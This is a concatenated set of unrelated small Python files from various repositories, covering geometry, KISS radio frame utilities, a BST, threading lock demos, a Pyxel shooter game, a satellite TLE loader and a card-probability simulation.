118856e83db829a6b05620cd23e13b85b24e7b8f | Python | u1273400/iscjava | /xpy/trihp.py | UTF-8 | 194 | 3.265625 | 3 | [] | no_license | from math import sqrt
def trihp (a,b, c, f, g):
return 0.5*c*(sqrt(a**2-((c**2+a**2-b**2)/(2*c))**2)+sqrt(f**2-((c**2+f**2-g**2)/(2*c))**2))
area=trihp(3.2, 2.6, 5.15,4.0, 5.5)
print(area) | true |
4112e3a80e7f2e71cdeaab7f658d8a37fe807c7d | Python | xssfox/kiss-fix | /kiss/util.py | UTF-8 | 2,731 | 2.640625 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Python KISS Module Utility Functions Definitions."""
from . import constants
__author__ = 'Greg Albrecht W2GMD <oss@undef.net>' # NOQA pylint: disable=R0801
__copyright__ = 'Copyright 2017 Greg Albrecht and Contributors' # NOQA pylint: disable=R0801
__license__ = 'Apache License, Version 2.0' # NOQA pylint: disable=R0801
def escape_special_codes(raw_codes):
"""
Escape special codes, per KISS spec.
"If the FEND or FESC codes appear in the data to be transferred, they
need to be escaped. The FEND code is then sent as FESC, TFEND and the
FESC is then sent as FESC, TFESC."
- http://en.wikipedia.org/wiki/KISS_(TNC)#Description
"""
output = b''
for i, x in enumerate(raw_codes):
x = bytes([x])
if constants.FESC == x:
output += constants.FESC_TFESC
elif constants.FEND == x:
output += constants.FESC_TFEND
else:
output += x
return output
def recover_special_codes(escaped_codes):
"""
Recover special codes, per KISS spec.
"If the FESC_TFESC or FESC_TFEND escaped codes appear in the data received,
they need to be recovered to the original codes. The FESC_TFESC code is
replaced by FESC code and FESC_TFEND is replaced by FEND code."
- http://en.wikipedia.org/wiki/KISS_(TNC)#Description
"""
output = b''
enumerated = enumerate(escaped_codes)
for i, x in enumerated:
if constants.FESC_TFESC == escaped_codes[i:i+2]:
output += constants.FESC
next(enumerated, None)
elif constants.FESC_TFEND == escaped_codes[i:i+2]:
output += constants.FEND
next(enumerated, None)
else:
output += bytes([x])
return output
def extract_ui(frame):
"""
Extracts the UI component of an individual frame.
:param frame: APRS/AX.25 frame.
:type frame: str
:returns: UI component of frame.
:rtype: str
"""
start_ui = frame.split(
b''.join([constants.FEND, constants.DATA_FRAME]))
end_ui = start_ui[0].split(b''.join([constants.SLOT_TIME, constants.UI_PROTOCOL_ID]))
return ''.join([chr(x >> 1) for x in end_ui[0]])
def strip_df_start(frame):
"""
Strips KISS DATA_FRAME start (0x00) and newline from frame.
:param frame: APRS/AX.25 frame.
:type frame: str
:returns: APRS/AX.25 frame sans DATA_FRAME start (0x00).
:rtype: str
"""
return frame.lstrip(constants.DATA_FRAME).strip()
def strip_nmea(frame):
"""
Extracts NMEA header from T3-Micro or NMEA encoded KISS frames.
"""
if len(frame) > 0:
if frame[0] == 240:
return frame[1:].rstrip()
return frame
| true |
19eb5eb412afbf3d5ade665fb570cdde7f49e089 | Python | hiSh1n/learning_Python3 | /py_project02.py | UTF-8 | 172 | 4.28125 | 4 | [] | no_license | #To convert temperature Celsius to Fahrenheit using formula.
tempc = int(input("enter temperature in celsius: "))
tempf = float(tempc * 1.8 + 32)
print(tempf, "farenheit")
| true |
8c8cd7cdbf451df6531e6cf7d5c575d5fb019d56 | Python | mcewenar/PYTHON_INFO_I_BASIC | /lectura_archivos/read.py | UTF-8 | 575 | 3.25 | 3 | [] | no_license | archivo = open('C:\\Users\\dmcew\\proy_programacion\\Info_I\\lectura_archivos\\prueba.txt','r')
contenido1= archivo.readlines() #Lee todas las líneas y las pasa alista
#contenido1=archivo.read()
contenido2=archivo.read()
for linea in archivo:
print (linea)
print (contenido1)
print ('Re-leyendo')
print (contenido2) #Como ya leyó todo el archivo, sale en espacio en blanco
print ('Fin de programa')
archivo.close()
#lengu = ('C:\\Users\\dmcew\\proy_programacion\\Info_I\\lectura_archivos\\prueba.txt','r')
#cadena = lengu.read()
#print(len(cadena))
#archivo.close() | true |
e5a15b2a961f884c31af9ac9ad0fa96ac7cc36aa | Python | NHERI-SimCenter/SimCenterBootcamp2019 | /Code/Python/SimpleCode/countdown.py | UTF-8 | 120 | 3.34375 | 3 | [] | no_license | def countdown(n):
if n<1:
return
while n>0:
print(n)
n -= 1
# execution
countdown(10)
| true |
cdba4884b45b44f6873f3c2c49f6291ba41dc35d | Python | wduan2/learning | /python/basic/bst.py | UTF-8 | 3,490 | 3.390625 | 3 | [] | no_license | class Bst:
class Node:
def __init__(self, value=None, left=None, right=None):
self.value = value
self.left = left
self.right = right
def __init__(self):
self.root = Bst.Node()
def add(self, value):
self.__add(self.root, value)
def add_all(self, values):
for v in values:
self.add(v)
def __add(self, node, value):
if not node.value:
node.value = value
return
if value < node.value:
if not node.left:
node.left = Bst.Node(value)
return
child = node.left
else:
if not node.right:
node.right = Bst.Node(value)
return
child = node.right
self.__add(child, value)
def most_unique(self, node, parent, count, min_count, result):
"""
Note:
- set initial value of min_count
- set initial count of root
- not break the reference of result list
- return count and min_count to upper recursion
"""
if not node:
return [count, min_count]
count, min_count = self.most_unique(node.left, parent, count, min_count, result)
if not parent or parent.value == node.value:
count += 1
if (not node.right) or (node.value != node.right.value):
if count < min_count or min_count == 0:
min_count = count
# not break the ref
result.clear()
result.append(node)
elif count == min_count:
result.append(node)
count = 1
parent = node
return self.most_unique(node.right, parent, count, min_count, result)
def in_order(self, node, all_path):
if not node:
return
self.in_order(node.left, all_path)
all_path.append(node)
self.in_order(node.right, all_path)
def pre_order(self):
pass
def post_order(self):
pass
def smallest(self, node, order, q):
if not node or len(q) == order:
return
self.smallest(node.left, order, q)
# save to a queue to resolve the situation where the elements include duplication
if len(q) == 0 or (len(q) < order and q[-1].value != node.value):
q.append(node)
self.smallest(node.right, order, q)
def run(self):
data1 = [9, 5, 13, 1, 8, 7, 10, 21, 18, 20]
data2 = [1, 1, 1, 1, 1, 1]
data3 = [1]
data4 = [1, 1, 2, 2]
data5 = [1, 2, 3, 4, 5, 6, 7]
data6 = [1, 1, 2, 2, 3, 4, 4, 4, 5, 5, 6, 6, 7, 7]
data7 = [9, 5, 13, 1, 8, 7, 10, 21, 18, 20, 9]
for data in [data1, data2, data3, data4, data5, data6, data7]:
self.root = Bst.Node()
self.add_all(data)
most_unique = []
self.most_unique(self.root, None, 0, 0, most_unique)
print(f"most_unique, input: {data}, output: {', '.join([str(p.value) for p in most_unique])}")
q = []
order = 2
in_order = []
self.smallest(self.root, order, q)
self.in_order(self.root, in_order)
ss = 'N/A'
if len(q) == order:
ss = q[order - 1].value
print(f"second_smallest, in order: [{', '.join([str(p.value) for p in in_order])}], result: {ss}\n")
| true |
72647acea29fb767c94553ca566d13b3962365d7 | Python | kagxin/recipe | /concurrent_futures/threading_counter.py | GB18030 | 2,946 | 3.28125 | 3 | [] | no_license | # coding=gbk
import threading, time
from threading import RLock, Lock, Condition, Event
count = 0
def print_hello(*args, **kwargs):
print(args, kwargs)
class TimerCircle(threading.Timer):
def run(self):
while True:
self.finished.wait(self.interval)
# if not self.finished.is_set():
self.function(*self.args, **self.kwargs)
# self.finished.set()
t = TimerCircle(1, print_hello, 'hello')
t.start()
# t = threading.Timer(1, print_hello, 'hello')
# t.start()
class Counter(threading.Thread):
def __init__(self, lock, threadName):
super(Counter, self).__init__(name=threadName)
self.lock = lock
def run(self):
global count
self.lock.acquire()
for _ in range(10000):
count = count + 1
self.lock.release()
lock = threading.Lock()
for i in range(5):
Counter(lock, "thread-" + str(i)).start()
print(count)
time.sleep(10)
lock1 = threading.Lock()
def conter(*args):
print(args)
global count, lock1
lock1.acquire()
for _ in range(10000):
count = count + 1
lock1.release()
for i in range(5):
t = threading.Thread(target=conter, name="thread-"+str(i), args=(1, 2))
t.start()
"""
threading : е4
t = threading.Lock()
t.acquire(blocking=True, timeout=-1) ȡtͷǰһֱ
t.release() ͷt
t = threading.RLock()
t.acquire(blocking=True, timeout=-1) ȡڵǰ߳Ѿ
t.release() ͷ
ͬһ߳Уacquirereleaseͬacquirereleaseǰ߳һȡ߳ȡ
threading.Event
t = threading.Condition()
t.acquire(*args) ȡײ
t.release() ͷŵײ
t.wait(timeout=None)
ȴֱ֪ͨʱ߳ڵô˷ʱδȡRuntimeError÷ͷŵײȻֱһ߳е
ͬnotifynotify_allûѣֱѡijʱһѻʱ»ȡء
t.wait_for()
t.notify(n=1)
Ĭ£һ̵߳ȴеĻ ߳ڵô˷ʱδȡRuntimeError
÷ѵȴ߳n; û߳ڵȴЧġ
n߳ڵȴǰʵֽûn̡߳ ǣΪDzȫġ δŻʵֿżỽѳn̡߳
ע⣺һѵ߳ʵϲwait÷أֱ»ȡ notifyͷӦá
t.notify_all()
"""
| true |
87090156619b2dc102bc6ae7a7da225d3b4d87fc | Python | Edo-Hachi/PyxelTinyMevious | /ProjectFile/mevious.py | UTF-8 | 9,504 | 3 | 3 | [
"MIT"
] | permissive | import pyxel
import define
import enemy
#------------------------------------------------------------------------------
# グローバル変数
bullet_list = [] #ザッパー管理リスト
enemy_list = [] #敵管理リスト
_VSYNC = 0
#------------------------------------------------------------------------------
# #線形リストオブジェクトへのupdate一括処理
def update_list(list):
for elem in list:
elem.update()
#------------------------------------------------------------------------------
#線形リストオブジェクトへのdraw一括処理
def draw_list(list, vsync):
for elem in list:
elem.draw(vsync)
#------------------------------------------------------------------------------
#線形リストオブジェクトメンバ破棄
def flash_list(list):
i = 0
while i < len(list):
elem = list[i]
if not elem.alive:
list.pop(i)
#print("pop")
else:
i += 1
#------------------------------------------------------------------------------
#自弾管理クラス
class Bullet:
def __init__(self, x, y):
self.x = x
self.y = y
self.w = define.BULLET_WIDTH
self.h = define.BULLET_HEIGHT
self.alive = True
bullet_list.append(self)
def update(self):
self.y -= define.BULLET_SPEED
#自弾移動
if self.y + self.h - 1 < 0:
self.alive = False
bx = self.x
by = self.y
for i in range(len(enemy_list)):
if enemy_list[i].alive == True:
ex = enemy_list[i].ex
ey = enemy_list[i].ey
if ey <= by and by <= (ey + enemy_list[i].eh):
if ex <= bx and bx <= (ex + enemy_list[i].ew):
enemy_list[i].alive = False
self.alive = False
def draw(self, vsync):
#print(str(vsync))
#pyxel.blt(self.x, self.y, 0, 8, 32, 8, 8 , 15)
if vsync % 10:
pyxel.blt(self.x, self.y, 0, 0, 32, define.BULLET_WIDTH, define.BULLET_HEIGHT, define.MASK_COLOR)
else:
pyxel.blt(self.x, self.y, 0, 8, 32, define.BULLET_WIDTH, define.BULLET_HEIGHT, define.MASK_COLOR)
#------------------------------------------------------------------------------
def _Update_Title(self):
#ゲームスタート
if pyxel.btn(pyxel.KEY_1):
self.GameState = define.STATE_PLAY
self.Map_y = (255 - 32)
self.y_offset = 8
self.px = 128 - 8 #自機の座標
self.py = 200
self.vsync = 0
#------------------------------------------------------------------------------
def _Draw_Title(self):
# 画面を消去
pyxel.cls(0)
# 1cha = 4pix
pyxel.blt(58, 50, 1, 0, 208, 140, 47, define.MASK_COLOR)
#txt = "Smell Like Tiny XEVIOUS"
#txtlen = len(txt) * 4
#pyxel.text(128 - (txtlen /2), 50, txt, 7)
txt = "Press [1] to Start Game!"
txtlen = len(txt) * 4
pyxel.text(128 - (txtlen /2), 128, txt, 7)
#pyxel.text(123, 60, txt, 14)
#pyxel.blt(124, 64, #実画面の表示原点
# 1, #タイルマップページ番号
# 0, 208 , #タイルマップの表示原点
# 128, 46) #表示範囲
#------------------------------------------------------------------------------
def _Update_Play(self):
#self.vsync += 1
if 59 <= self.vsync:
self.vsync = 0
else:
self.vsync += 1
#print(str(self.vsync))
#testcode
#キー入力&方向転換
if pyxel.btn(pyxel.KEY_LEFT):
self.px -= define.PLAYER_SPEED
#self.mDY = 0
self.map_offx -= 1
#self.map_offy = 0
if pyxel.btn(pyxel.KEY_RIGHT):
self.px += define.PLAYER_SPEED
#self.mDY = 0
self.map_offx += 1
#self.map_offy = 0
if pyxel.btn(pyxel.KEY_UP):
#self.mDX = 0
self.py -=define.PLAYER_SPEED
#self.map_offx = 0
self.map_offy -= 1
if pyxel.btn(pyxel.KEY_DOWN):
#self.mDX = 0
self.py += define.PLAYER_SPEED
#self.map_offx = 0
self.map_offy += 1
#ザッパー発射
#if pyxel.btn(pyxel.KEY_X):
if pyxel.btnp(pyxel.KEY_X, 10, 20):
Bullet(self.px, self.py)
Bullet(self.px + 10, self.py)
#enemyクラスの共有メンバにプレイヤーの座標をセット
enemy.Enemy.player_x = self.px
enemy.Enemy.player_y = self.py
#敵ダミー発生
#debug
if pyxel.btnp(pyxel.KEY_A, 10, 30):
#enemy_list.append(enemy.Enemy_Toroid(self.px, self.py, 50, 0))
enemy_list.append(enemy.Enemy_Toroid(50, 0, 16, 16))
#debug
if pyxel.btnp(pyxel.KEY_8, 10, 30):
self.scroll = True
if pyxel.btnp(pyxel.KEY_9, 10, 30):
self.scroll = False
#自弾更新処理
update_list(bullet_list)
flash_list(bullet_list)
#敵キャラ更新処理
update_list(enemy_list)
flash_list(enemy_list)
#------------------------------------------------------------------------------
def _Draw_Play(self):
# 描画\
# 画面を消去
pyxel.cls(0)
#背景表示(タイルマップ全景表示デバッグ用)
#debug--------------------------------------------------------------
pyxel.bltm(0,0, #実画面の表示原点
0, #タイルマップページ番号
self.map_offx, self.map_offy , #タイルマップの表示原点
32,32) #表示範囲
#debug--------------------------------------------------------------
#debug(タイルマップスクロール処理テスト) -------------------------------------------------------------
# pyxel.bltm(0,self.y_offset * -1, #実画面の表示原点
# 0, #タイルマップページ番号
# 0, self.Map_y , #タイルマップの表示原点
# 32,33) #表示範囲
# self.map_offx = 0
# self.map_offy = 1
#debug -------------------------------------------------------------
#debug
if self.scroll == True:
self.y_offset -= 0.5
#self.y_offset -= 1
if self.y_offset == 0:
self.y_offset = 8
self.Map_y -= 1
#--------------------------------------------------------------------
#赤いコアの点滅テスト
if self.vsync % 20 == 0:
self.colcnt += 1
if self.colcnt == 0:
pyxel.pal()
elif self.colcnt == 1:
pyxel.pal(11, 12)
elif self.colcnt == 2:
pyxel.pal(11, 13)
elif self.colcnt == 3:
pyxel.pal(11, 14)
elif self.colcnt == 4:
pyxel.pal(11, 14)
elif self.colcnt == 5:
pyxel.pal(11, 13)
elif self.colcnt == 6:
pyxel.pal(11, 12)
elif self.colcnt == 7:
#pyxel.pal()
self.colcnt = 0
#--------------------------------------------------------------------
#赤いコアの点滅テスト
#ソルバルウ
pyxel.blt(self.px, self.py, 0, 0, 0, define.PLAYER_WIDTH, define.PLAYER_HEIGHT, define.MASK_COLOR)
#レティクル
pyxel.blt(self.px, self.py - 64, 0, 16, 0, 16, 16, define.MASK_COLOR)
#線形リストオブジェクトの描画処理
#if self.vsync % 3 == 0:
draw_list(bullet_list, self.vsync) #ザッパー表示
#敵表示
draw_list(enemy_list, self.vsync) #敵表示
#debug
temp = "PX= " + str(self.px) + ": PY=" + str(self.py)
pyxel.text(0, 0, temp, 7)
#------------------------------------------------------------------------------
#ゲームメインループ
class GameMain:
def __init__(self):
# 初期化
pyxel.init(define.WINDOW_WIDTH, define.WINDOW_HEIGHT, caption="Smell Like Tiny Mevious",
# 0 1 2 3 4 5 6 7(白) 8(未使用) 9 10 11(赤1) 12(赤2) 13(赤3) 14(赤4) 15(透過色)
palette=[0x000000, 0x8CC323, 0x69B923, 0x007846, 0xF0EB3C, 0x194696, 0x7D7D7D, 0xFFFFFF, 0xFFFFFF, 0x824141, 0xC8AA32, 0xff1414, 0xC81414, 0x961414, 0x641414, 0xC896B4],
fps = 60, quit_key=pyxel.KEY_Q)
#pyxel.init(255, 255, caption="Xevious", fps=60, quit_key=pyxel.KEY_Q)
pyxel.load("./assets/mevious.pyxres")
pyxel.image(0).load(0, 0, "./assets/mevious_01.png")
pyxel.image(1).load(0, 0, "./assets/mevious_bg.png")
self.GameState = define.STATE_TITLE
#debug
self.colcnt = 0
self.scroll = True
#debug
self.map_offx = 0
self.map_offy = 0
pyxel.run(self.update, self.draw)
def update(self):
if self.GameState == define.STATE_PLAY:
_Update_Play(self)
elif self.GameState == define.STATE_TITLE:
_Update_Title(self)
def draw(self):
if self.GameState == define.STATE_PLAY:
_Draw_Play(self)
elif self.GameState == define.STATE_TITLE:
_Draw_Title(self)
GameMain()
| true |
c052d1bdbab67f90d16cada85d8e90cfd74b84b9 | Python | Neminem1203/Puzzles | /DailyCodingProblem/47-hindsightStockTrade.py | UTF-8 | 723 | 4.5 | 4 | [] | no_license | '''
Given a array of numbers representing the stock prices of a company in chronological order, write a function that calculates the maximum profit you could have made from buying and selling that stock once. You must buy before you can sell it.
For example, given [9, 11, 8, 5, 7, 10], you should return 5, since you could buy the stock at 5 dollars and sell it at 10 dollars.
'''
def stocktrade(company):
current_low = company[0]
profit = 0
for price in company:
if(price - current_low > profit):
profit = price-current_low
if(current_low > price):
current_low = price
return profit
print(stocktrade([9, 11, 8, 5, 7, 10]))
print(stocktrade([9, 20, 1, 5, 7, 11])) | true |
4cdba18dc592e82cd400e9ef1b5ed8b5324babad | Python | jeremymturner/pytle | /pytle/__init__.py | UTF-8 | 4,530 | 2.625 | 3 | [
"Apache-2.0"
] | permissive | import ephem
import os
from os.path import join, dirname, abspath, isfile
from datetime import datetime, timedelta
import logging
import json
from jinja2 import Template
try:
from urllib.request import urlopen, Request
except ImportError:
from urllib import urlencode
from urllib2 import urlopen, Request, HTTPError
name = "pytle"
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
def get_path(filename):
packagedir = abspath(__file__)
fulldir = join(dirname(packagedir), 'data')
fullname = join(fulldir, filename)
return fullname
class pytle:
def __init__(self, keps_url='', cache=False):
if keps_url:
if cache:
cache_dir = os.environ.get('HOME') + '/.' + type(self).__name__
keps = self.try_cache(keps_url, cache_dir)
else:
keps = self.download_keps(keps_url)
self.satlist = self.load_keps(keps)
def get_sat_info(self, name):
item = self.satlist.get(name, {})
if "ephem" in item:
item.pop("ephem")
return item
def get_sat_info_text(self, name):
with open(get_path('templates/sat_info.j2')) as sat_info:
template = Template(sat_info.read())
return template.render(self.get_sat_info(name))
def download_keps(self, keps_url):
logging.debug("Downloading keps from " + keps_url)
try:
with urlopen(keps_url) as response:
self.data = data = response.read()
kep_lines = data.decode().split('\n')
except TimeoutError:
logging.error("Timeout in accessing " + keps_url)
exit()
return kep_lines
def cache_keps(self, cache_file):
logging.debug("Writing keps cache to " + cache_file)
with open(cache_file, 'wb') as out_file:
out_file.write(self.data)
def load_keps(self, keps):
satlist = {}
kepslist = []
self.names = names = [line.translate(str.maketrans(' ', '_')) for i, line in enumerate(keps) if i % 3 == 0]
for i, line in enumerate(keps):
if i % 3 == 2:
name = keps[i - 2].strip().translate(str.maketrans(' ', '_'))
eph = ephem.readtle(
keps[i - 2],
keps[i - 1],
keps[i])
logging.debug("TLE " + name)
satlist[name] = {}
# Load satellite specific defaults (band, frequencies, mode)
if isfile(get_path("sats/" + name + ".json")):
with open(get_path("sats/" + name + ".json")) as file:
satinfo = json.loads(file.read())
logging.debug("SAT " + name)
for key, value in satinfo[name].items():
try:
# Python 2
key = key.encode('utf-8') if isinstance(key, unicode) else key
value = value.encode('utf-8') if isinstance(value, unicode) else value
except NameError:
# Python 3 (nothing)
pass
satlist[name][key] = value
satlist[name]["ephem"] = eph
logging.debug("Loaded %s satellites" % len(names))
return satlist
def try_cache(self, keps_url, cache_dir):
cache_file = cache_dir + '/keps.txt'
cache_days = 7
cache_file_ts = None
keps = None
# If the cache dir does not exist
if not os.path.isdir(cache_dir):
os.mkdir(cache_dir)
# If the cache file does not exist
if not os.path.isfile(cache_file):
keps = self.download_keps(keps_url)
self.cache_keps(cache_file=cache_file)
# If the cache file exits
else:
weekago = datetime.now() - timedelta(days=cache_days)
cache_file_ts = datetime.fromtimestamp(os.path.getctime(
cache_file))
# If the cache exists and is up to date
if cache_file_ts > weekago:
logging.debug("Using cached keps from " + cache_file)
with open(cache_file) as file:
return file.read().split('\n')
else:
keps = self.download_keps(keps_url)
self.cache_keps(cache_file=cache_file)
return keps
| true |
8e23e2a4ccef6e6d1a41632fdd5161481fa7bcc9 | Python | zhangchen6523/test | /videoCapture/test.py | UTF-8 | 371 | 2.734375 | 3 | [] | no_license | from tkinter import *
fontSize = 12
root = Tk()
root.title("测试程序")
root.geometry("1200x500")
root.resizable(width=False, height=False)
l = Label(root, text="测试开始", bg="black", font=("Arial", fontSize), width=8, height=3)
l.pack(side=TOP)
b = Button(root, text="点击处理", font=("Arial", fontSize), width=8, height=3)
b.pack(side=LEFT)
root.mainloop() | true |
8b1473ab767238588611ba69101255152db1aa76 | Python | Nano-UT/appli_stat_report | /1st_report/card_stat.py | UTF-8 | 610 | 3.375 | 3 | [] | no_license | from random import shuffle
def trial():
lis = [i//4 for i in range(52)]
shuffle(lis)
tmp = 1
while(True):
if len(lis) < 5:
return(20)
if len(lis[:5]) == len(set(lis[:5])):
tmp += 1
lis = lis[5:]
else:
return(tmp)
data = [trial() for _ in range(40000)]
ave = sum(data) / len(data)
dev_square = [(data[i] - ave) ** 2 for i in range(len(data))]
unbiased_var = sum(dev_square) / (len(data) - 1)
std_err = (unbiased_var / len(data)) ** (1/2)
print("期待値の推定値: " + str(ave))
print("推定誤差: " + str(std_err))
| true |